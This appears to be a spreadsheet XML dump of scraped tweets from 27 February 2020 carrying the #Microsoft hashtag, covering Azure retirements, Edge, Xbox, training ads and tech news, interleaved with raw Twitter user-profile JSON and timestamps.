    <t>{'id': 22924849, 'id_str': '22924849', 'name': 'CCW Digital', 'screen_name': 'CCW_Digital', 'location': 'New York, NY', 'description': 'CCW Digital is the global online community and research hub for more than 150,000 customer contact members ðŸ’¡ ðŸŒŽ ðŸ’¬ ðŸ“¨info@ccwdigital.com', 'url': 'https://t.co/DK9s094IeJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/DK9s094IeJ', 'expanded_url': 'http://www.customercontactweekdigital.com', 'display_url': 'customercontactweekdigital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11544, 'friends_count': 10325, 'listed_count': 393, 'created_at': 'Thu Mar 05 14:34:18 +0000 2009', 'favourites_count': 4405, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13326, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1F426D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/897832058998927360/TB98plGP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897832058998927360/TB98plGP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22924849/1552575978', 'profile_link_color': '1B234E',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</si>
  <si>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Feb 27 18:14:37 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: We are retiring Azure AD Domain Services classic VNET support on March 1, 2023
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/xLugIqGkT0</t>
  </si>
  <si>
    <t>Thu Feb 27 18:14:36 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Site Recovery data encryption feature will be retired April 30, 2022
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/YVrkMZNh3F</t>
  </si>
  <si>
    <t>Thu Feb 27 18:12:35 +0000 2020</t>
  </si>
  <si>
    <t>Guess who will be in #Prague soooooon
#Microsoft #MicrosoftLife https://t.co/DpSFWcrhK2</t>
  </si>
  <si>
    <t>Thu Feb 27 18:12:14 +0000 2020</t>
  </si>
  <si>
    <t>@Skytap announces public availability of #IBMPower on @Azure. Find out more https://t.co/1Xg7AenTnB #MSPartner #Microsoft #AIX #IBMi</t>
  </si>
  <si>
    <t>{'id': 850232098703015936, 'id_str': '850232098703015936', 'name': 'Mike Ihlenfeldt', 'screen_name': 'mizzle51', 'location': 'SeaTac, WA', 'description': 'Helper of those who have problems with the cloud. Sounders enthusiast. PC/Xbox gamer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 179, 'listed_count': 0, 'created_at': 'Fri Apr 07 06:21:43 +0000 2017', 'favourites_count': 380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 323, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/851300696288665601/Ir0L_yEc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/851300696288665601/Ir0L_yEc_normal.jpg',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</si>
  <si>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18:12:09 +0000 2020</t>
  </si>
  <si>
    <t>Meet the new Yammer Webinar [March 5]! #Microsoft  https://t.co/rT8jCgai8S</t>
  </si>
  <si>
    <t>Update to the background image of the Office 365 sign-in screens #Microsoft  https://t.co/SaTqzDVE6q</t>
  </si>
  <si>
    <t>OneDrive Customer Spotlight Series:  Rackspace #Microsoft  https://t.co/gsedI6pMtJ</t>
  </si>
  <si>
    <t>Improve collaboration across apps and customize experiencesheres whats new to Microsoft 365 in February #Microsoft  https://t.co/KxW4V9j6ML</t>
  </si>
  <si>
    <t>Thu Feb 27 18:11:41 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery data encryption feature will be retired April 30, 2022  https://t.co/gvoGjjKlK8   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023  https://t.co/SlT2vo66cN   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 18:11:24 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Citrix Partner Award: " https://t.co/7OOJorsFYj
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Thu Feb 27 18:10:00 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone
#Microsoft #Azure
https://t.co/7h02m9nSM2</t>
  </si>
  <si>
    <t>Thu Feb 27 18:09:32 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     @Microsoft365 polled Twitter followers to see how often they worked remotely and 72% of respondents work from home at least 1 day per week. With Microsoft, organizations can be agile and keep data secure. https://t.co/Gc40MwmzgM</t>
  </si>
  <si>
    <t>Thu Feb 27 18:09:05 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/1UqII8HZgC #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:08:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery data encryption feature will be retired April 30, 2022 https://t.co/8wXovYA4rh #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023 https://t.co/MZbpMA5nwR #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Thu Feb 27 18:06:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 Business Central Training from the experts
https://t.co/tFwmVpgHzv
#businesscentral #d365 #dynamics365 #erp #Microsoft #Southampton #Fareham #whiteley #Portsmouth https://t.co/OPNEYmh7c8</t>
  </si>
  <si>
    <t>Thu Feb 27 18:05:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/MmTgIghU70 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 18:03:22 +0000 2020</t>
  </si>
  <si>
    <t>Boost sales productivity: Meet customers at any journey point, implement seamless solutions, ease onboarding &amp;amp; alignment +more. Read more &amp;amp; subscribe!  #Microsoft #Dynamics365 and Southwest Modern Data Systems, Inc.. https://t.co/BC6JobtG1p</t>
  </si>
  <si>
    <t>Thu Feb 27 18:03:21 +0000 2020</t>
  </si>
  <si>
    <t>Learn and Earn at PrepMasters USA - #1 Online #Microsoft Approved MCT and CTTplus Certification  Enroll now - https://t.co/cVkaPu7HDg  Study online at your pace https://t.co/CRyCBp5mH7</t>
  </si>
  <si>
    <t>Thu Feb 27 18:03:04 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/IR0dkDCmvE #Microsoft #Azure #Cloud https://t.co/Ll7nEvmjZx</t>
  </si>
  <si>
    <t>Thu Feb 27 18:02:42 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone  https://t.co/McxfG759oM #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Thu Feb 27 18:02:13 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone: https://t.co/fFEZQsnxCn #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:01:59 +0000 2020</t>
  </si>
  <si>
    <t>Twitter videos show off #Microsoft's Surface Duo 'peek' feature https://t.co/HYu9bW1Eik by @eliblumenthal</t>
  </si>
  <si>
    <t>Thu Feb 27 18:01:45 +0000 2020</t>
  </si>
  <si>
    <t>90% of all garments end up in a landfill. @NatashaFranck, founder of EON, is using #IoT to put an end to the waste with RFID #tech and #Microsoft. What can you do with IoT? https://t.co/XcJb45EHCg</t>
  </si>
  <si>
    <t>{'id': 986620763972296707, 'id_str': '986620763972296707', 'name': 'Andosi', 'screen_name': 'Andosi_Dynamics', 'location': 'Global', 'description': 'The art of great system design &amp; our architects are bar-none when it comes to building business solutions that solve even the most complex, intricate challenges', 'url': 'https://t.co/5YQz6o68gC', 'entities': {'url': {'urls': [{'url': 'https://t.co/5YQz6o68gC', 'expanded_url': 'http://www.andosi.com', 'display_url': 'andosi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 83, 'friends_count': 148, 'listed_count': 3, 'created_at': 'Wed Apr 18 15:01:35 +0000 2018', 'favourites_count': 145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 662,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'http://pbs.twimg.com/profile_images/999687334290325504/utL-vLHd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/999687334290325504/utL-vLHd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986620763972296707/1524064582',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</si>
  <si>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18:01:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Cognitive Services are an easy way to add artificial intelligence to your apps, offering pay-as-you-go access to a selection of useful algorithms.  &amp;gt;&amp;gt; https://t.co/z6VbUY4NmJ
#machinelearning #AI #data #algorithms #microsoft #cognitiveservice</t>
  </si>
  <si>
    <t>{'id': 409196556, 'id_str': '409196556', 'name': 'Franklin Fitch', 'screen_name': 'Franklin_Fitch', 'location': 'London', 'description': 'IT Specialist Recruitment Consultancy. Follow us for news, insights and tips!We specialise in #Network #Server #DevOps #Security #Data and #ITManagement', 'url': 'http://t.co/QK7fItzmZ8', 'entities': {'url': {'urls': [{'url': 'http://t.co/QK7fItzmZ8', 'expanded_url': 'http://www.franklinfitch.com', 'display_url': 'franklinfitch.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 509, 'friends_count': 1243, 'listed_count': 77, 'created_at': 'Thu Nov 10 12:05:21 +0000 2011', 'favourites_count': 425, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4460, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '99CC99', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1019910038121480192/Z1Q8yLHO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019910038121480192/Z1Q8yLHO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/409196556/1543587290', 'profile_link_color': '006666',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</si>
  <si>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18:00:45 +0000 2020</t>
  </si>
  <si>
    <t>Preview of Active Directory authentication support on Azure Files https://t.co/y6LTamVOlA #Azure #Microsoft #Identity #AccessManagement #Serverless</t>
  </si>
  <si>
    <t>Thu Feb 27 18:00:33 +0000 2020</t>
  </si>
  <si>
    <t>Promote your reports, dashboards, and apps on Power BI Home 
https://t.co/0NkDAZSH7i
#Microsoft #PowerBI #DataAnalytics #Reports #Dashboards #Apps</t>
  </si>
  <si>
    <t>Thu Feb 27 18:00:27 +0000 2020</t>
  </si>
  <si>
    <t>Interested in learning how to classify an uploaded #image using #Microsoft Cognitive Services, Computer Vision API?
Read the latest blog from Core BTS Solutions Architect Rajesh Sitaraman to learn how: https://t.co/Z1Ln0HoKhD https://t.co/VMvvdiK7FV</t>
  </si>
  <si>
    <t>Thu Feb 27 18:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Sort of #BoringAI but very useful -  Use Azure Cognitive Services to automate forms processing https://t.co/AATNcnxjNJ #ai #ArtificialInteligence #azure #cloud #MachineLearning #microsoft https://t.co/MngEmGNd4A</t>
  </si>
  <si>
    <t>Thu Feb 27 18:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Patch Alert: February 2020 patches bring fire and ice: https://t.co/3C69O1CsVF via @computerworld #Microsoft #TechNews</t>
  </si>
  <si>
    <t>{'id': 474325732, 'id_str': '474325732', 'name': 'PC-Canada.com', 'screen_name': 'PCCanadacom', 'location': 'Kitchener, Ontario', 'description': 'Official Account! Online Shopping Made Easy! Great prices, FAST shipping and a HUGE selection of in-stock #computer #products &amp; #accessories! #Technology #Tech', 'url': 'http://t.co/IYGSxoyNvJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/IYGSxoyNvJ', 'expanded_url': 'http://www.pc-canada.com', 'display_url': 'pc-canada.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 439, 'friends_count': 1238, 'listed_count': 240, 'created_at': 'Wed Jan 25 21:49:57 +0000 2012', 'favourites_count': 194, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11903,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'http://pbs.twimg.com/profile_images/831145462967185410/_J2BtxJd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/831145462967185410/_J2BtxJd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/474325732/1486995596', 'profile_link_color': '456073',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</si>
  <si>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17:59:59 +0000 2020</t>
  </si>
  <si>
    <t>The ENAVATE Pricing and Costing App manages a high volume of pricing changes while protecting and growing margins across your diverse customer and supplier base. Learn more: https://t.co/ql5v8tzk3A
#MicrosoftAppSource #microsoft #microsoftpartner #d365 #dynamics365 #distributors</t>
  </si>
  <si>
    <t>{'id': 3100151659, 'id_str': '3100151659', 'name': 'ENAVATE, Inc.', 'screen_name': 'ENAVATE', 'location': 'Denver, CO', 'description': 'Offering business consulting &amp; high volume distribution-focused enterprise software solutions based on the Microsoft Dynamics 365, AX &amp; CRM platforms.', 'url': 'http://t.co/7X2OFXvfIA', 'entities': {'url': {'urls': [{'url': 'http://t.co/7X2OFXvfIA', 'expanded_url': 'http://www.enavate.com', 'display_url': 'enavate.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 381, 'friends_count': 818, 'listed_count': 15, 'created_at': 'Fri Mar 20 19:26:30 +0000 2015', 'favourites_count': 94, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 845,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'http://pbs.twimg.com/profile_images/598550774671540224/kAL8Z4Q1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/598550774671540224/kAL8Z4Q1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3100151659/1434667693', 'profile_link_color': '00B5C0',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</si>
  <si>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17:58:54 +0000 2020</t>
  </si>
  <si>
    <t>Being an SME member since the start ; glad to be at #MxD for #Microsoft  Envision forum on #manufacturing and listening to Chandra Brown, CEO of MxD https://t.co/kTOcJbS2tG</t>
  </si>
  <si>
    <t>{'id': 3362629071, 'id_str': '3362629071', 'name': 'PDA-LLC', 'screen_name': 'PDALLC', 'location': 'Naperville, IL', 'description': 'Product Development &amp; Analysis', 'url': 'http://t.co/YNjF7vtiqk', 'entities': {'url': {'urls': [{'url': 'http://t.co/YNjF7vtiqk', 'expanded_url': 'http://www.pda-llc.com/', 'display_url': 'pda-llc.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 79, 'friends_count': 196, 'listed_count': 3, 'created_at': 'Mon Jul 06 16:34:42 +0000 2015', 'favourites_count': 113, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/618097911545511939/IYZcl-Zi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/618097911545511939/IYZcl-Zi_normal.jpg',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</si>
  <si>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17:58:18 +0000 2020</t>
  </si>
  <si>
    <t>And following #Microsoft's strategy, it's not really valid to call it a "base" anymore. It's an option in the #Xbox / #Windows10 family of devices, which of course includes PC.  We should stop thinking about the #XboxSeriesX as a console, and more as a Win10 device.</t>
  </si>
  <si>
    <t>Thu Feb 27 17:58:10 +0000 2020</t>
  </si>
  <si>
    <t>#Unity and #Microsoft are now out of #GDC2020 . How long until the event is officially cancelled ?
https://t.co/fs091SxIuu</t>
  </si>
  <si>
    <t>{'id': 1640548938, 'id_str': '1640548938', 'name': 'Flavien Brebion', 'screen_name': 'inovae_flavien', 'location': 'Bruxelles', 'description': 'President, CTO and Cofounder of I-Novae Studios, LLC.', 'url': 'http://t.co/LuO4JTG5GO', 'entities': {'url': {'urls': [{'url': 'http://t.co/LuO4JTG5GO', 'expanded_url': 'http://www.inovaestudios.com/', 'display_url': 'inovaestudios.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1066, 'friends_count': 68, 'listed_count': 27, 'created_at': 'Fri Aug 02 14:25:25 +0000 2013', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 980,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'http://pbs.twimg.com/profile_images/929781146145251330/TSkBJ3hX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/929781146145251330/TSkBJ3hX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1640548938/1523816602', 'profile_link_color': '01AAD0',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</si>
  <si>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17:57:47 +0000 2020</t>
  </si>
  <si>
    <t>Inbound... 
YeesDaa Will be joining the Streaming community soon... 
#xbox #mixer #preparing #streaming #gettingready #microsoft https://t.co/Jt2T9FMyN0</t>
  </si>
  <si>
    <t>{'id': 2327144428, 'id_str': '2327144428', 'name': 'ã‚¤ã‚§ã‚¹ãƒ€ãƒ‹ã‚¨ãƒ«', 'screen_name': 'SantiagoYesda', 'location': 'Dallas, TX', 'description': 'Xbox Ambassor. #Teamxbox #bungie Dedicated Destiny Player Xbox GT: YeesDaa', 'url': 'https://t.co/17Hp9d7yD1', 'entities': {'url': {'urls': [{'url': 'https://t.co/17Hp9d7yD1', 'expanded_url': 'https://www.facebook.com/yesdanielsantiago', 'display_url': 'facebook.com/yesdanielsantiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 566, 'listed_count': 8, 'created_at': 'Thu Feb 06 02:08:02 +0000 2014', 'favourites_count': 5264, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5805,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'http://pbs.twimg.com/profile_images/1230153966652153858/mTQKd05C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230153966652153858/mTQKd05C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2327144428/1582126534',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</si>
  <si>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17:52:03 +0000 2020</t>
  </si>
  <si>
    <t>Join 4 people right now at "Xbox Series X may not be delayed by coronavirus, but new Microsoft Surface products could be" #cheers #technology #tech #mobile #android #coronavirus #microsoft #techradar #products #surface #delayed #series #xbox #news https://t.co/ltOQamcYEQ https://t.co/UyPAcWCMmA</t>
  </si>
  <si>
    <t>{'id': 166340892, 'id_str': '166340892', 'name': 'Cheers for Tech', 'screen_name': 'tech_cheers', 'location': 'In the cloud', 'description': "What's happening at the Massive Online Technology Party on Cheers. Gadgets. Hardware. PCs. Cameras. Stereos.", 'url': 'https://t.co/Gx0gxVw4Hx', 'entities': {'url': {'urls': [{'url': 'https://t.co/Gx0gxVw4Hx', 'expanded_url': 'http://cheers.ws/channel/technology', 'display_url': 'cheers.ws/channel/technoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2691, 'friends_count': 3056, 'listed_count': 84, 'created_at': 'Tue Jul 13 22:42:44 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 71193, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0A0909', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/889187519363002368/p-bIzy5K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/889187519363002368/p-bIzy5K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/166340892/1487035402',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</si>
  <si>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17:50:13 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft launches its new Chromium-based Edge through the Windows 10 Insider Update
#Microsoft #WindowsInsider #MicrosoftEdge #Windows10 https://t.co/xyjTsaC8bR https://t.co/zBnNSI78nO</t>
  </si>
  <si>
    <t>{'id': 1181822089692626945, 'id_str': '1181822089692626945', 'name': 'TechRadar247', 'screen_name': 'TRadar247', 'location': 'United States', 'description': 'TechRadar247 brings you the latest technology and games news from all around the globe.', 'url': 'https://t.co/hcKyvcu12Y', 'entities': {'url': {'urls': [{'url': 'https://t.co/hcKyvcu12Y', 'expanded_url': 'https://www.techradar247.com', 'display_url': 'techradar247.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Wed Oct 09 06:42:07 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 164, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1185914880672567296/xnzy9_DR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185914880672567296/xnzy9_DR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1181822089692626945/1579381808',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</si>
  <si>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17:48:29 +0000 2020</t>
  </si>
  <si>
    <t>Learn Microsoft Flow..35% off #udemy_coupon_code #Best_courses, #Microsoft, #office_productivity https://t.co/BJLnrx3cPY https://t.co/xwssIXsQ07</t>
  </si>
  <si>
    <t>Thu Feb 27 17:48:28 +0000 2020</t>
  </si>
  <si>
    <t>Learn Microsoft Flow..35% off #udemy_coupon_code #Best_courses, #Microsoft, #office_productivity https://t.co/BJLnrx3cPY https://t.co/3ewCHKYkY3</t>
  </si>
  <si>
    <t>Thu Feb 27 17:48:26 +0000 2020</t>
  </si>
  <si>
    <t>Learn Microsoft Teams..#udemy 100% free course #Microsoft, #Microsoft_Teams, #New_course, #office_productivity https://t.co/RBFfTd5DQh https://t.co/42emNj43gR</t>
  </si>
  <si>
    <t>Thu Feb 27 17:47:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has begun rolling out the much-awaited Chromium-based Edge browser with a new Windows 10 update for Windows 10 users, starting with Windows Insider in the release preview ring.
#Microsoft
https://t.co/O8bilE9IJR</t>
  </si>
  <si>
    <t>Thu Feb 27 17:47:06 +0000 2020</t>
  </si>
  <si>
    <t>Run WRF v4 on Azure HPC Virtual Machines https://t.co/C73Jox3Qt7 #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:47:05 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/Rci3A4zrMT #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:46:52 +0000 2020</t>
  </si>
  <si>
    <t>#Google  #Apple #Microsoft #Visa. The compelling case for global mega cap investing  https://t.co/6aS34KacWZ</t>
  </si>
  <si>
    <t>{'id': 2293993950, 'id_str': '2293993950', 'name': 'AshburtonInvestments', 'screen_name': 'AshburtonInvest', 'location': '', 'description': 'Ashburton Investments is the investment management arm of the FirstRand Group #assetmanagement #alternativeassets', 'url': 'https://t.co/HP1ys0vywJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/HP1ys0vywJ', 'expanded_url': 'http://www.ashburtoninvestments.com', 'display_url': 'ashburtoninvestments.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4080, 'friends_count': 679, 'listed_count': 85, 'created_at': 'Thu Jan 16 06:56:43 +0000 2014', 'favourites_count': 478, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6203,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'http://pbs.twimg.com/profile_images/880794854619570176/ikBqf12b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/880794854619570176/ikBqf12b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2293993950/1498832818', 'profile_link_color': 'B30838',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</si>
  <si>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17:46:12 +0000 2020</t>
  </si>
  <si>
    <t>With Amazon SageMaker Autopilot, AWS has taken the first step in making AutoML solution transparent and explainable. The platform appeals to both expert data scientists and entry-level ML developers. #microsoft https://t.co/v9KalZJDdT https://t.co/TMgwnneh8j</t>
  </si>
  <si>
    <t>Thu Feb 27 17:44:49 +0000 2020</t>
  </si>
  <si>
    <t>Day 4
Afer finishing working with #authentication  Ive started learning #Microsoft SQL server managment as a database
I am really excited to write and execute foolish queries
#SQL
#MSSM 
#__sql___
#100DaysOfCode</t>
  </si>
  <si>
    <t>{'id': 760088801263902720, 'id_str': '760088801263902720', 'name': 'Ù…Ù…Ø±Ø¶Ø§', 'screen_name': '_MrA111_', 'location': '', 'description': 'Ø´Ø§ÛŒØ¹ Ù†ÛŒØ³ØªÙ… ÙˆÙ„ÛŒ Ø§Ø­ØªØ±Ø§Ù… Ù†Ø¸Ø§Ù…ÛŒ ||Ø­Ø§Ù„Ø§ Ø´Ø§ÛŒØ¯ ÛŒÙ‡ ÙˆÙ‚Øª Ø¯ÛŒÚ¯Ù‡ Ø¨Ø§ Ø­Ø§Ù„ Ø¨Ù‡ØªØ± ||ðŸ‘¨\u200dðŸ’»ðŸ¤”ðŸ¤·ðŸ¼\u200dâ™‚ï¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 114, 'listed_count': 0, 'created_at': 'Mon Aug 01 12:24:26 +0000 2016', 'favourites_count': 4162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 92, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217421275519471616/mf930IOL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217421275519471616/mf930IOL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760088801263902720/1470054832',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</si>
  <si>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17:44:30 +0000 2020</t>
  </si>
  <si>
    <t>"How many of you have used NoGo, I mean, GoGo on planes"  #CISO #Microsoft #ZeroTrust #RSAC2020</t>
  </si>
  <si>
    <t>{'id': 463990194, 'id_str': '463990194', 'name': 'Kiat æ˜Ž', 'screen_name': 'kiat77', 'location': 'Los Angeles (WeHo)', 'description': 'Not all those who wander, are lost.\nAdorkable ðŸ¼ | ENFP | Worldly | Foodie | Wanderlust.\nKL â€¢ UK â€¢ DC â€¢ LA', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 485, 'listed_count': 20, 'created_at': 'Sat Jan 14 18:20:14 +0000 2012', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3569,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'http://pbs.twimg.com/profile_images/853503082662998017/4Kg2OpO7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/853503082662998017/4Kg2OpO7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/463990194/1481092806',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</si>
  <si>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17:43:52 +0000 2020</t>
  </si>
  <si>
    <t>Join our NICE and Microsoft compliance rock-stars for a forum dedicated to Cloud and Teams. Its your last chance to register  click here and find out more &amp;gt;&amp;gt; 
https://t.co/25coVe6D8I
#NICECompliance #NetworkwithNICE #MicrosoftTeams #Microsoft #CX #Finance #Compliance https://t.co/zZotzIMXWX</t>
  </si>
  <si>
    <t>{'id': 923334753985511424, 'id_str': '923334753985511424', 'name': 'Rohan Garg', 'screen_name': 'Rgarg1994', 'location': 'Mumbai, India', 'description': 'Leaving a simple life but.......', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 150, 'listed_count': 0, 'created_at': 'Wed Oct 25 23:45:34 +0000 2017', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 398, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/923339251974004737/oRHYKShX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/923339251974004737/oRHYKShX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/923334753985511424/1508976206',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</si>
  <si>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17:43:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts MCSA, MCSD, and MCSE certifications will retire on 30th June 2020. https://t.co/xuy5s1Bs7C  #microsoft #certifications</t>
  </si>
  <si>
